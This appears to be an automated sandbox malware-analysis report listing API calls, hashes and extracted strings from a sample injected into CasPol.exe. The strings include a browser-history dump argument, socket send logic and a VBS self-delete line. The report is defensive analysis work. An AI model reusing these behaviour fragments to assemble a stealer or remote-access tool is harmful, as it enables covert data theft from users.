                                                                                                                                                              • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                                                                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                                              • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                                                                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                                              APIs
                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                                              • _free.LIBCMT ref: 0044E1A0
                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                              • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                                                                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                                              • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                                                                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                                              APIs
                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                              • _free.LIBCMT ref: 100071B8
                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                              • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                              • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                              • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                              • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                                                                              • _free.LIBCMT ref: 00446F7D
                                                                                                                                                              • _free.LIBCMT ref: 00446FA4
                                                                                                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                              • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                                                                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                                                              • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                                                                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                              • _free.LIBCMT ref: 10005BB4
                                                                                                                                                              • _free.LIBCMT ref: 10005BDB
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                              • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                              • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                              • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                              • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2951400881-0
                                                                                                                                                              • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                                                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                                                              • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                                                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                              • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 493641738-0
                                                                                                                                                              • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                              • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                              • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                              • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 0044F7B5
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              • _free.LIBCMT ref: 0044F7C7
                                                                                                                                                              • _free.LIBCMT ref: 0044F7D9
                                                                                                                                                              • _free.LIBCMT ref: 0044F7EB
                                                                                                                                                              • _free.LIBCMT ref: 0044F7FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 100091D0
                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                              • _free.LIBCMT ref: 100091E2
                                                                                                                                                              • _free.LIBCMT ref: 100091F4
                                                                                                                                                              • _free.LIBCMT ref: 10009206
                                                                                                                                                              • _free.LIBCMT ref: 10009218
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                              • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                              • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                              • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 00443305
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              • _free.LIBCMT ref: 00443317
                                                                                                                                                              • _free.LIBCMT ref: 0044332A
                                                                                                                                                              • _free.LIBCMT ref: 0044333B
                                                                                                                                                              • _free.LIBCMT ref: 0044334C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 1000536F
                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                              • _free.LIBCMT ref: 10005381
                                                                                                                                                              • _free.LIBCMT ref: 10005394
                                                                                                                                                              • _free.LIBCMT ref: 100053A5
                                                                                                                                                              • _free.LIBCMT ref: 100053B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                              • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                              • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                              • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                              • String ID: (FG
                                                                                                                                                              • API String ID: 3142014140-2273637114
                                                                                                                                                              • Opcode ID: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                                                                                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                                                              • Opcode Fuzzy Hash: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                                                                                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                                                              APIs
                                                                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,0064BB38,00000010), ref: 004042A5
                                                                                                                                                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                              • String ID: XCG$`AG$>G
                                                                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                                                                              • Opcode ID: b1869af57b07db370673fff23365936bf3c7d3263b17e0aa9e3b0b370ee1b369
                                                                                                                                                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                                              • Opcode Fuzzy Hash: b1869af57b07db370673fff23365936bf3c7d3263b17e0aa9e3b0b370ee1b369
                                                                                                                                                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
                                                                                                                                                              • _free.LIBCMT ref: 10004CE8
                                                                                                                                                              • _free.LIBCMT ref: 10004CF2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                              • API String ID: 2506810119-3657627342
                                                                                                                                                              • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                              • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                              • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                              • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                              • API String ID: 368326130-2663660666
                                                                                                                                                              • Opcode ID: 03d025f5093637cf68c7e3e5187cd53dd33040ecfd3fb4839ff056847571c0a6
                                                                                                                                                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                                                              • Opcode Fuzzy Hash: 03d025f5093637cf68c7e3e5187cd53dd33040ecfd3fb4839ff056847571c0a6
                                                                                                                                                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                              • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateExecuteExitFileProcessShell
                                                                                                                                                              • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                                                              • API String ID: 2309964880-3562070623
                                                                                                                                                              • Opcode ID: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                                                                              • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                                                                                              • Opcode Fuzzy Hash: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                                                                              • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                                              Strings
